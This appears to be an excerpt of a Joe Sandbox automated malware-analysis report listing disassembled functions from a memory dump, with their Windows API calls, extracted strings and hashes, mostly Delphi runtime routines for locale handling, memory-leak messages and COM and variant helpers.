Strings

GetLongPathNameA, xrefs: 02B15933
\, xrefs: 02B15A49
kernel32.dll, xrefs: 02B15920

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: c4cff8e046979f3f225ec367358ea433210ad60c419e9a9d5ed35ed01914e410
Instruction ID: 905c21ffe8dacf7c1d34f93c8a29a4feee15821d9281af3665a937d068eacd2e
Opcode Fuzzy Hash: c4cff8e046979f3f225ec367358ea433210ad60c419e9a9d5ed35ed01914e410
Instruction Fuzzy Hash: 9A418171E10619AFDB20DAE8CC88ADEB3BDEF48340FC445E5A658E7245E774DA448F90

Function 02B15BD8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON

Download Yara Rule

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B15BE8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B15BF5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B15BFB
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B15C26
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B15C6D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B15C7D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B15CA5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B15CB5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B15CDB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B15CEB

Strings

Software\Borland\Delphi\Locales, xrefs: 02B15B38
Software\Borland\Locales, xrefs: 02B15AFC, 02B15B1A

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
Instruction ID: 62d51a6d47bec3f5ff2a09b0e2781232562ec7bd0e096047ac09988cb12e3b6a
Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
Instruction Fuzzy Hash: 1B318471E4026C6AEB35DAB89C85FDF77AD9B44380FC401E29648E6181DB749F848F90

Function 02B17FD2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02B17FF5

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
Instruction ID: d1b01f7b7ecbb76af78f08fd2bddc1c0b1fe0ed451d2bfef95bd40ca9d615cc0
Opcode Fuzzy Hash: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
Instruction Fuzzy Hash: A311C0B5A00209AF9B04CF99C881DBFF7F9FFC8300B54C569A509E7254E6719A018B90

Function 02B1A7C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B1A7E2

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
Instruction ID: 2c0be3ec501732e34097e27960e5e910dff8cef024a2f81397b4d0f33d2c2540
Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
Instruction Fuzzy Hash: 0BE0D871B0021417D311A5589C80EF6736D9B58310F8042FABD15C7385EDE0AE848BE4

Function 02B1B78C Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,02B3D106,00000000,02B3D11E), ref: 02B1B79A

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 1ca47c8ba3a81762b4421bee666ac1a0309ecbeb84c6d260fdcdcd5bc6f48df8
Instruction ID: 912d13be15c01edde08139fe5364f143dfaa3b64daf79b64149dd6a9a1cbc3a1
Opcode Fuzzy Hash: 1ca47c8ba3a81762b4421bee666ac1a0309ecbeb84c6d260fdcdcd5bc6f48df8
Instruction Fuzzy Hash: E4F09D74A44301DFD350DF28D441A1AB7E9FF48B94F808DAAEA9887380E734D8148B52

Function 02B1A810 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02B1BE72,00000000,02B1C08B,?,?,00000000,00000000), ref: 02B1A823

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
Instruction ID: d587ccab2ad496537fb049c2a83c85784c3b01e094b5767708e64874f5dbb2d0
Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
Instruction Fuzzy Hash: 1CD05EA670E2602AA210A15A2D84DBB5ADCCFC67A1F8040BAB988C6101D210DD07DAB1

Function 02B1920C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 02B19210

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
Instruction ID: 52f9ffa0ec4a7821e472b7f731096f940d11e3a87547e6358cbbc9d5af24f82d
Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
Instruction Fuzzy Hash: F0A0124040582041854033180C0257431455921A20FC4878068F8402D0E91D01208093

Function 02B3E596 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 496cc97dc467e2ed5abe413d305ea60b2081591f6e43546630f843c8a76cb622
Instruction ID: 840064d389c783b3031a2b8e4f26eea228478de0f43b006a8fde208c4f262957
Opcode Fuzzy Hash: 496cc97dc467e2ed5abe413d305ea60b2081591f6e43546630f843c8a76cb622
Instruction Fuzzy Hash: B151599285E3D14FC7638B7448BA1C23FB0AD3362435E51CBC8D09F1A3E209991BDB62

Function 02B120C4 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Function 02B1D294 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02B1D29D

Part of subcall function 02B1D268: GetProcAddress.KERNEL32(00000000), ref: 02B1D281

Strings

oleaut32.dll, xrefs: 02B1D298
VarDiv, xrefs: 02B1D32F
VarAnd, xrefs: 02B1D371
VarNot, xrefs: 02B1D2D7
VarMod, xrefs: 02B1D35B
VarSub, xrefs: 02B1D303
VarBstrFromBool, xrefs: 02B1D479
VarBstrFromCy, xrefs: 02B1D44D
VarOr, xrefs: 02B1D387
VarCyFromStr, xrefs: 02B1D421
VarDateFromStr, xrefs: 02B1D40B
VarI4FromStr, xrefs: 02B1D3C9
VarR4FromStr, xrefs: 02B1D3DF
VarIdiv, xrefs: 02B1D345
VariantChangeTypeEx, xrefs: 02B1D2AB
VarCmp, xrefs: 02B1D3B3
VarBoolFromStr, xrefs: 02B1D437
VarXor, xrefs: 02B1D39D
VarAdd, xrefs: 02B1D2ED
VarR8FromStr, xrefs: 02B1D3F5
VarMul, xrefs: 02B1D319
VarNeg, xrefs: 02B1D2C1
VarBstrFromDate, xrefs: 02B1D463

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: b443657c2734cd024e7598013f2844046adc9808b9b82cd93c0809a548f52abf
Instruction ID: ab797fb8c09b08b16e4b5de84b03299ad6174d89a9e79b7915815f80c00cded5
Opcode Fuzzy Hash: b443657c2734cd024e7598013f2844046adc9808b9b82cd93c0809a548f52abf
Instruction Fuzzy Hash: 5C4180E3AA830A5B52086B6EB500427FBDED345B503E046DBF884CB384DD74FC518A6E

Function 02B26ED8 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ole32.dll), ref: 02B26EDE
GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02B26EEF
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02B26EFF
GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02B26F0F
GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02B26F1F
GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02B26F2F
GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02B26F3F

Strings

CoInitializeEx, xrefs: 02B26EF9
CoReleaseServerProcess, xrefs: 02B26F19
CoAddRefServerProcess, xrefs: 02B26F09
ole32.dll, xrefs: 02B26ED9
CoSuspendClassObjects, xrefs: 02B26F39
CoCreateInstanceEx, xrefs: 02B26EE9
CoResumeClassObjects, xrefs: 02B26F29

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
API String ID: 667068680-2233174745
Opcode ID: 8f5a95351153522a1582fba12d6dd480a43677f41fb71cb39ff725e988e19850
Instruction ID: a25fb6b2bde3ef0bcc12d3f4fc15160cb17dd42138a1a575ed5fffbaa3f07075
Opcode Fuzzy Hash: 8f5a95351153522a1582fba12d6dd480a43677f41fb71cb39ff725e988e19850
Instruction Fuzzy Hash: E8F050F0A8A351BDBF00FB745CC18AA375DAF246443401CD6F91B56556FB75D8188F10

Function 02B12530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02B128CE

Strings

Unexpected Memory Leak, xrefs: 02B128C0
7, xrefs: 02B126A1
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02B12849
bytes: , xrefs: 02B1275D
Unknown, xrefs: 02B1278C
The unexpected small block leaks are:, xrefs: 02B12707
, xrefs: 02B12814
An unexpected memory leak has occurred. , xrefs: 02B12690
String, xrefs: 02B127A1

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: 903978b729aacb5ddda16b82b3b9124eaf4e57fbd2b33411e07235d969c7761f
Instruction ID: 5507c5600d56c3f15398d43084f1c377e7a5ebc66945d8ed52f2b813e81388f0
Opcode Fuzzy Hash: 903978b729aacb5ddda16b82b3b9124eaf4e57fbd2b33411e07235d969c7761f
Instruction Fuzzy Hash: 04A1D230A042B88BDF21AA2CCC84B99B7E5EF09350F9441F5ED49AB386CB7599C5CF51

Function 02B1252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

Unexpected Memory Leak, xrefs: 02B128C0
7, xrefs: 02B126A1
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02B12849
bytes: , xrefs: 02B1275D
The unexpected small block leaks are:, xrefs: 02B12707
, xrefs: 02B12814
An unexpected memory leak has occurred. , xrefs: 02B12690

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: 99f57f3881e2a15a6eef4d32ec7501292bea8005034faeda27033fbad7b4e4fb
Instruction ID: bae71f51e1f4e8534cbb57ed49cab5ffccd1a85b2b893d872a0a95acdb38912b
Opcode Fuzzy Hash: 99f57f3881e2a15a6eef4d32ec7501292bea8005034faeda27033fbad7b4e4fb
Instruction Fuzzy Hash: C571B130A042B88FDF21EA2CCC84BD9BAE5EF09744F9041E5D949EB285DB758AC5CF51

Function 02B1BDC0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,02B1C08B,?,?,00000000,00000000), ref: 02B1BDF6

Part of subcall function 02B1A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B1A7E2

Strings

mmmm d, yyyy, xrefs: 02B1BEF2
:mm, xrefs: 02B1C029
AMPM , xrefs: 02B1C019
:mm:ss, xrefs: 02B1C046
AMPM, xrefs: 02B1C00A
m/d/yy, xrefs: 02B1BEC5

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: b8227e90d2a097cfddd5d19b250c711e8ca5b5275bdc34d7432c15379972680e
Instruction ID: d14148c337e30014d83076611864d3586be67db5fcd1728b496b6ca07752be80
Opcode Fuzzy Hash: b8227e90d2a097cfddd5d19b250c711e8ca5b5275bdc34d7432c15379972680e
Instruction Fuzzy Hash: EA612135B401489BDB00EBA4D894B9F7BBBDF88700FD098F6E1019B645DA39EA06DF51

Function 02B2AFE0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 02B2B000
GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02B2B017
IsBadReadPtr.KERNEL32(?,00000004), ref: 02B2B0AB
IsBadReadPtr.KERNEL32(?,00000002), ref: 02B2B0B7
IsBadReadPtr.KERNEL32(?,00000014), ref: 02B2B0CB

Strings

LoadLibraryExA, xrefs: 02B2B00D
KernelBase, xrefs: 02B2B012

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: Read$HandleModule
String ID: KernelBase$LoadLibraryExA
API String ID: 2226866862-113032527
Opcode ID: 5879f9bec06d05b45b446c89e24d0ebea646dde06d61af14613575026d47e791
Instruction ID: f155cd0650f8b316ac0a53285981359ab5518f0d306c32bfe56e2cbf3bc9e26f
Opcode Fuzzy Hash: 5879f9bec06d05b45b446c89e24d0ebea646dde06d61af14613575026d47e791
Instruction Fuzzy Hash: 60317671A40315BBDB21DB68CC85F9E77A8FF05358F044691FA68D72C1DB34A948CBA4

Function 02B1435C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B14423,?,?,02B967C8,?,?,02B3E7A8,02B165B1,02B3D30D), ref: 02B14395
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B14423,?,?,02B967C8,?,?,02B3E7A8,02B165B1,02B3D30D), ref: 02B1439B
GetStdHandle.KERNEL32(000000F5,02B143E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B14423,?,?,02B967C8), ref: 02B143B0
WriteFile.KERNEL32(00000000,000000F5,02B143E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B14423,?,?), ref: 02B143B6
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02B143D4

Strings

Error, xrefs: 02B143C8
Runtime error at 00000000, xrefs: 02B1438E, 02B143CD

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: cea0da9495ffe2cee9e62574b311271e22c32437dfbb118a1ebc825fb3201102
Instruction ID: bef5d682c9f2e70c7491bc5fa255f4bb0a3e19e2733ebf28f773ca4da8d8f5ac
